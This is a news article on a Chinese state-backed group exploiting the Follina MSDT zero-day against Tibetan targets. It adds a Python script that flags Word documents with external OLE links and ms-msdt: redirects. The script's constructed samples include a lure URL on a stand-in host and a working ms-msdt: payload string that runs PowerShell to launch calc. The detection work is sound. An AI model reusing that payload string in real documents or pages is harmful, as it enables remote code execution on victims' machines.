Chinese APT exploits Follina
China-backed hackers are exploiting a still-unpatched Microsoft zero-day known as “Follina” (tracked as CVE-2022-30190). The flaw sits in the Microsoft Support Diagnostic Tool (MSDT): a crafted Office document can invoke the ms-msdt: URL protocol and have MSDT run attacker-supplied code on the victim’s Windows system.
Microsoft has warned that the flaw could let threat actors install programs, view, change or delete data, and create new accounts “in the context allowed by the user’s rights”, that is, with the privileges of the user who opened the document rather than as SYSTEM.
Researchers have observed the flaw being exploited against Russian and Belarusian users since April, and enterprise security firm Proofpoint said this week that a Chinese state-sponsored group has been exploiting the zero-day in attacks on the international Tibetan community.
“TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique. Campaigns impersonate the ‘Women Empowerments Desk’ of the Central Tibetan Administration and use the domain tibet-gov.web[.]app,” the firm wrote.
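The delivery chain Proofpoint describes (URL → ZIP → Word document → external OLE reference → HTML page that redirects to an ms-msdt: URL) leaves two artefacts a triage script can check without opening the document in Office: the document’s relationship file carries an oleObject relationship whose Target is an external URL instead of an internal embeddings/ entry, and the fetched HTML carries the ms-msdt: scheme with a PowerShell subexpression in the IT_BrowseForFile parameter. The following is an added example, not code from Proofpoint, Microsoft or the article; the ZIP, both documents, the file names, the lure URL (lure.example) and the HTML snippet are all constructed in memory for the demonstration and are not samples from the campaign.

```python
"""Triage a delivered ZIP for the Follina document chain (added example)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def external_ole_targets(docx_bytes):
    """Return the Target of every oleObject relationship marked External.

    A normal embedded object is internal (Target="embeddings/oleObject1.bin",
    no TargetMode). A Follina lure points the object at an attacker URL so
    Word fetches HTML, which then invokes the ms-msdt: URL protocol.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as docx:
        for name in docx.namelist():
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(docx.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    hits.append(rel.get("Target", ""))
    return hits


def scan_zip_lure(zip_bytes):
    """Map each Word document inside the outer ZIP to its external OLE targets."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as outer:
        for name in outer.namelist():
            if name.lower().endswith((".docx", ".docm", ".dotx", ".dotm")):
                report[name] = external_ole_targets(outer.read(name))
    return report


def msdt_indicators(html):
    """Inspect fetched HTML for an ms-msdt: redirect.

    Returns None when the scheme is absent; otherwise the diagnostic package
    id and whether IT_BrowseForFile carries a PowerShell subexpression $( ),
    the part MSDT evaluates.
    """
    m = re.search(r"ms-msdt:[^\n]*", html)
    if not m:
        return None
    url = m.group(0)
    pkg = re.search(r"/id\s+(\S+)", url)
    browse = re.search(r"IT_BrowseForFile=(\S*)", url)
    value = browse.group(1) if browse else ""
    return {
        "package": pkg.group(1) if pkg else None,
        "browse_for_file": value,
        "powershell_subexpression": "$(" in value,
    }


# --- constructed samples (hypothetical names and URL, not campaign data) ---
LURE_URL = "http://lure.example/payload.html!"
LURE_RELS = (
    '<Relationships xmlns="{ns}"><Relationship Id="rId5" Type="{t}" '
    'Target="{u}" TargetMode="External"/></Relationships>'
).format(ns=RELS_NS, t=OLE_REL, u=LURE_URL)
BENIGN_RELS = (
    '<Relationships xmlns="{ns}"><Relationship Id="rId5" Type="{t}" '
    'Target="embeddings/oleObject1.bin"/></Relationships>'
).format(ns=RELS_NS, t=OLE_REL)
SAMPLE_HTML = r'''<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_BrowseForFile=$(Invoke-Expression('calc'))i/../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script></body></html>'''


def _docx(rels_xml):
    """Build a minimal .docx in memory around the given relationships XML."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("word/document.xml", "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def build_sample_zip():
    """Outer ZIP with one lure document, one benign document and a text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Women_Empowerment_Desk.docx", _docx(LURE_RELS))
        z.writestr("notes.docx", _docx(BENIGN_RELS))
        z.writestr("readme.txt", "constructed sample")
    return buf.getvalue()


if __name__ == "__main__":
    for doc, targets in scan_zip_lure(build_sample_zip()).items():
        print(doc, "->", targets or "no external OLE target")
    print(msdt_indicators(SAMPLE_HTML))
```

The relationship check is the one worth automating at a mail gateway, since it needs only the OOXML package and no network access; the HTML check is for analysts who have already captured the second stage. An external oleObject target is not by itself proof of Follina (other phishing documents use remote templates and OLE links), so treat a hit as a reason to detonate in a sandbox rather than as a verdict.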
Proofpoint has previously observed the TA413 threat actor – also tracked as “LuckyCat” and “Earth Berberoka” – targeting Tibetan organizations using malicious browser extensions and COVID-19 themed espionage campaigns.
Until a patch ships, Microsoft’s guidance recommends disabling the MSDT URL protocol as a workaround; the instructions from that guidance are reproduced below: